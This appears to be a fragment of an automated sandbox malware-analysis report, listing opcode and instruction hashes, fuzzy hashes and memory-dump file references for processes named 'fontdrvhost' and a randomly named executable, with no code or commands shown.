                                                                                                                                                                                              • Opcode ID: 4b7adad853cc7d37d43a69badf4c8f368a528e2da076fde9eff174bc84e107c6
                                                                                                                                                                                              • Instruction ID: d0f5f03359824428358a12034047509888e554b9799f4ffef04809c3d6207eda
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b7adad853cc7d37d43a69badf4c8f368a528e2da076fde9eff174bc84e107c6
                                                                                                                                                                                              • Instruction Fuzzy Hash: EAF0963245F3CA9FD3229BB088655DE7FA4EF43211B1900F6D485C70B2D66D561AC791
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5e157ca892806e3b67b6c232a351b86bc46978a40ef459c591ad974fe1d8de99
                                                                                                                                                                                              • Instruction ID: 9518b2f3971c20e21755033005b9861d3f7300ff067767008d4c25fb6e0f169e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e157ca892806e3b67b6c232a351b86bc46978a40ef459c591ad974fe1d8de99
                                                                                                                                                                                              • Instruction Fuzzy Hash: 93F0E91571F54E5FEB7596B195B21FD2B00EF45300F2508BAC74E970F2C908770253A1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2a07ddc8de2b102908ac680ce2a2a940877c6647d5857cc5cb07c1ed16527c0d
                                                                                                                                                                                              • Instruction ID: 7a6c7df169beb966d928d23f3db2e43249a8a8d6b4b28f58ca1b348e9a905fa2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a07ddc8de2b102908ac680ce2a2a940877c6647d5857cc5cb07c1ed16527c0d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 55F0BE25B0F98E8BEBB646B055B22FD2B50DF81300F2A047AC58E870E2CD0963039382
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
                                                                                                                                                                                              • Instruction ID: 6cdefe82af98f426c240c01dd2a60dab599bccd5c589262d73b9071cb8de7241
                                                                                                                                                                                              • Opcode Fuzzy Hash: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
                                                                                                                                                                                              • Instruction Fuzzy Hash: CBF0D631B1DC0E4BEA74DF98D864AB92392EF98711F570175D4AEE31B2DD386E414640
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 36b3307a59a12eec4264341d798aa82fecdfbb74f895b6b92c8370cf817d455e
                                                                                                                                                                                              • Instruction ID: dc2bcfa7488137aaf46b63576b29f809d5c51a7d19ab869c8e4c14a876bcce24
                                                                                                                                                                                              • Opcode Fuzzy Hash: 36b3307a59a12eec4264341d798aa82fecdfbb74f895b6b92c8370cf817d455e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 40F06221A0E38B4FDB235BB84CE15A93F90DF2731071A46BAC454CB1E7D65866058351
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 55a2d766cbeaa1aefa47f28a70623ac3dc84a67b48b7a99bd370e289017dc901
                                                                                                                                                                                              • Instruction ID: 8a5bdb2733e744ec6a4a3f547b6e6cfcb4db4bcd2478ec20c229157afde2c6f3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 55a2d766cbeaa1aefa47f28a70623ac3dc84a67b48b7a99bd370e289017dc901
                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E0223A608E09CFD700AB39CC948C17B90FB0A61ABAA00AED148C7612E2215828CB44
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 74fba5540ad5e12431ca79acf25ec2bfd82403f7fd4fb5844775a54d1f68887c
                                                                                                                                                                                              • Instruction ID: 5d2a1dcad2e4eec6f4183124f69b874c0546ae2886d6ff6894180abb6a94b8dd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 74fba5540ad5e12431ca79acf25ec2bfd82403f7fd4fb5844775a54d1f68887c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BF02B10B1D99D4ECB59AB7459629FA7B90EF49210F4406BBE18EC70D7CE28B21A93D0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 402caa23eb78bf53a40c82c019baa3c6c8ca191b856a58b8665ef6dde30079cd
                                                                                                                                                                                              • Instruction ID: 76bf7a70e59a4a8cee7b37d7963edcb2be63d35a6d6a25a20d95fb99c2c58738
                                                                                                                                                                                              • Opcode Fuzzy Hash: 402caa23eb78bf53a40c82c019baa3c6c8ca191b856a58b8665ef6dde30079cd
                                                                                                                                                                                              • Instruction Fuzzy Hash: DDF0E284B0F68E8AE77946FC85F137C2E50DF82310F2A05BAC58E870F6C8197705A291
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                                                                                                                                              • Instruction ID: 07e05e36d3654a81c545723494d80797128d798d82388cc9637ba8cad9c44e00
                                                                                                                                                                                              • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AF0B27490A95C9FCB55EAA8C85AE99BBB0FF68300F10019DD00ADB262CA219945CF40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: cf54574ddcc50799ea5c6ca5731293c98964cc92c99a0dd42eeded35e66fb0ef
                                                                                                                                                                                              • Instruction ID: f3b280f8b7a9db97261fca7db3118a0f8504802e52f063d057204609ef636f41
                                                                                                                                                                                              • Opcode Fuzzy Hash: cf54574ddcc50799ea5c6ca5731293c98964cc92c99a0dd42eeded35e66fb0ef
                                                                                                                                                                                              • Instruction Fuzzy Hash: 84E02051D5FB4E0BE61333FD587609D7A141F9A514F9600B3C47D471F3B89E32990652
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
                                                                                                                                                                                              • Instruction ID: b5a70a49c87fb26046e825190c62139de24eb986e3a421373c99526ea82fef17
                                                                                                                                                                                              • Opcode Fuzzy Hash: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BE01A20F2A81E4BFB75E794C8707F962A1AF9C700F1600B4D92E932E2DD386F419B40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b9a9d42f834fe1a74f0359cab22a3f21fdb7af40720368f1eaf8bb8ea9eca248
                                                                                                                                                                                              • Instruction ID: c779603401020045e51fd57917057efc69e05316e0464d944e5babc762c2ea23
                                                                                                                                                                                              • Opcode Fuzzy Hash: b9a9d42f834fe1a74f0359cab22a3f21fdb7af40720368f1eaf8bb8ea9eca248
                                                                                                                                                                                              • Instruction Fuzzy Hash: 83D01242F0F7894BE77606F408B316C1A50CF2B34075A06BAD5668E2E3D95969055322
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: bb9fa41ad516edd20d0743218354639571498677c24175f2ad321490b9fb3e0f
                                                                                                                                                                                              • Instruction ID: f71927d8b3379b61d841c5a2dcc79fbd03b816279e2fdcf64b7e1de2032a7d11
                                                                                                                                                                                              • Opcode Fuzzy Hash: bb9fa41ad516edd20d0743218354639571498677c24175f2ad321490b9fb3e0f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32D01252F1E38E4BFB3606B408B70781A90CF1B2407560DB7D55A8B1E3D94829455322
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4c3584593388bce4205435d600ac602d57c4889d2b2cd539ccbbd81f90dd5b0a
                                                                                                                                                                                              • Instruction ID: b9f5400b2d256afbc89b5b667c16fa98429be00934a7f268ed2d5676985724fa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c3584593388bce4205435d600ac602d57c4889d2b2cd539ccbbd81f90dd5b0a
                                                                                                                                                                                              • Instruction Fuzzy Hash: F1D0177591E68D96EB35ABB089A20ECBB64FF40700F1500BAE909030A1EA2427189A82
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                                                                                                                                                              • Instruction ID: c13aefb6d55cf501856f77e6c2bf2a23f1b88277974dd7f49fefe605013e4b9b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 54C04C05F6BE1F03F835B7EE98660ACA1405FDDA10FE70172D56D400F19C6E22D50196
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
                                                                                                                                                                                              • Instruction ID: cebd59e7d1bfd1e2b22818736a0133abcdeee54b43ecd42ac06bb63f4d92684a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
                                                                                                                                                                                              • Instruction Fuzzy Hash: 05C08C30511C0C8FC908EB28C88480433A0FB0D300BC20090E408C71B0D22ADCC1C780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
                                                                                                                                                                                              • Instruction ID: 2557c9ed606ebf0520aff8a5fe2091e7b835b4ce8d971a56c32bcdb955cf0b0e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AC08C305118088FC900F72CC98480032A0FB0D210BD20190E00EC7174E22A9C80C700
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
                                                                                                                                                                                              • Instruction ID: 2bc549a28dc6d0f9e818e3624b52157be55f0ea67fbf03ea0921c8b992feb18e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 02C04C303048189FD794DA5DC0D463877D1EF49301B5100B4E04ACF2B5C5289D499710
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5f6bdf610361c4f4f4b53f4a3e6ec0a008bf9899fbf6d884d6cfd36559dda039
                                                                                                                                                                                              • Instruction ID: 7a1a3297d65c938e5e01fa9083517115d412e3f0a6d64e3d3ba03470fe31df27
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f6bdf610361c4f4f4b53f4a3e6ec0a008bf9899fbf6d884d6cfd36559dda039
                                                                                                                                                                                              • Instruction Fuzzy Hash: BEC04C04F18C1A07F76A7798587257E44829B48704F950174E02DE77CEDD5C5E0212C7
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
                                                                                                                                                                                              • Instruction ID: 7965264658cb1207071bac2ece0e02941b71958e91d207eb8aa22643e27ff589
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
                                                                                                                                                                                              • Instruction Fuzzy Hash: D4C09B25E1945D46E73497B0C4253BA72516F5C204F578673406E96091DD3856415540
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                                                                                                                                                              • Instruction ID: 5da5ff76cf65608968526766dc672c9fc2555f591059f30dbc81451b12a4aa0e
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EB01200E67C0F02E42433FA0C9206470405F8D100FC300B0D42D400B1985E22940282
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000017.00000002.1887371897.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_23_2_7ffd9b880000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 5[_H
                                                                                                                                                                                              • API String ID: 0-3279724263
                                                                                                                                                                                              • Opcode ID: 9b38565e3fc7cc9ad097d0a3800b93aae1301d42a50fda34e52b6100020cf290
                                                                                                                                                                                              • Instruction ID: 97128ccbcba32e103bdfb147166b27ad539e40ca5243b1199282659cc5a34905
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b38565e3fc7cc9ad097d0a3800b93aae1301d42a50fda34e52b6100020cf290
                                                                                                                                                                                              • Instruction Fuzzy Hash: B091E1B5A19A8D8FEB59DB6C8C657A97FE1FF9A300F4001BAD119C72E6CF7818018710
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000017.00000002.1887371897.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_23_2_7ffd9b880000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d7b98cfe10ccfd992c4ec00095566ce3426eb3af43491f265d6211e196ce2498
                                                                                                                                                                                              • Instruction ID: 30445c737533680c47599506a52af3b1a9d5c173eb350bf962f2a6818e3510dc
                                                                                                                                                                                              • Opcode Fuzzy Hash: d7b98cfe10ccfd992c4ec00095566ce3426eb3af43491f265d6211e196ce2498
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9451CFB6A28D498BEB9CDB5C88697A97FE0EB99310F4001BED11AC73D5CF7818128310
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000017.00000002.1887371897.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_23_2_7ffd9b880000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: c9$!k9$"s9
                                                                                                                                                                                              • API String ID: 0-3426396564
                                                                                                                                                                                              • Opcode ID: 964e90bf5b31a5ecb5eb94aa9d1524e360d8db055ca863c69c2fe0ffacba69cf
                                                                                                                                                                                              • Instruction ID: 07960ecc945c78fc3916653149dd8474f82545f6b37777317d9bb0e272078288
                                                                                                                                                                                              • Opcode Fuzzy Hash: 964e90bf5b31a5ecb5eb94aa9d1524e360d8db055ca863c69c2fe0ffacba69cf
                                                                                                                                                                                              • Instruction Fuzzy Hash: F6F0F43B728D0A8BC7016B3EB8805D57780EBD9636BD505BBD204CB261E2201C9E83E0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000017.00000002.1887371897.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_23_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: M
                                                                                                                                                                                              • API String ID: 0-3664761504
                                                                                                                                                                                              • Opcode ID: 29da4b82ffc331327ae2990cbea34ad9eefb760b440755561446b5ef22a08a24
                                                                                                                                                                                              • Instruction ID: a5cf72a23167dbb78e61765d43a93f83e75194165e8af2dab7782b80377dedc5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 29da4b82ffc331327ae2990cbea34ad9eefb760b440755561446b5ef22a08a24
                                                                                                                                                                                              • Instruction Fuzzy Hash: FAF0E07094F3D55FCB15A775485D8547F60EF5720174941FEC086CF163D91D8886C741
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000017.00000002.1887371897.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_23_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: M
                                                                                                                                                                                              • API String ID: 0-3664761504
                                                                                                                                                                                              • Opcode ID: 230ba97b0b267c4b1448ca7cb140bfb97baa36aa3d2ee4e1f326e0de125a30d3
                                                                                                                                                                                              • Instruction ID: 59b73eac71e4658cb361c0ad03428d5a4707f72b87d10aa4f365f8c4d0516b4e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 230ba97b0b267c4b1448ca7cb140bfb97baa36aa3d2ee4e1f326e0de125a30d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: A2F0E57050F7C44FC71A9A7488288147FA0EF2720074A42EFC045CF1A3EA2CC889CB01
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000017.00000002.1887371897.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_23_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: M
                                                                                                                                                                                              • API String ID: 0-3664761504
                                                                                                                                                                                              • Opcode ID: d141e697d6f082d1976ef2c85797beeeaf8c75f1533f7d34af21a63e8fcb698e
                                                                                                                                                                                              • Instruction ID: 9731f67db491e75c8e49096a1311ee9fad004608a2c76cb669192b87f15f4a78
                                                                                                                                                                                              • Opcode Fuzzy Hash: d141e697d6f082d1976ef2c85797beeeaf8c75f1533f7d34af21a63e8fcb698e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF0A02060F3C44FC716DA7888298057FA0AF6721134A52EEC045CF1A3EA1C9885C701
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000017.00000002.1887371897.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_23_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: M
                                                                                                                                                                                              • API String ID: 0-3664761504
                                                                                                                                                                                              • Opcode ID: 3837b88d7eebc642db5f9453ee1ac5a0a1a89f90fb5f6f431c5185038c33e48e
                                                                                                                                                                                              • Instruction ID: 927e6cea1e00704e74e5d893fdea8012cf0829493879b4d31f9b11d4055e05f7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3837b88d7eebc642db5f9453ee1ac5a0a1a89f90fb5f6f431c5185038c33e48e
                                                                                                                                                                                              • Instruction Fuzzy Hash: E9E0396160E7C44FC71AAA748869854BFA0AF6721174A42EFC045CB1A3EA298889CB01
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
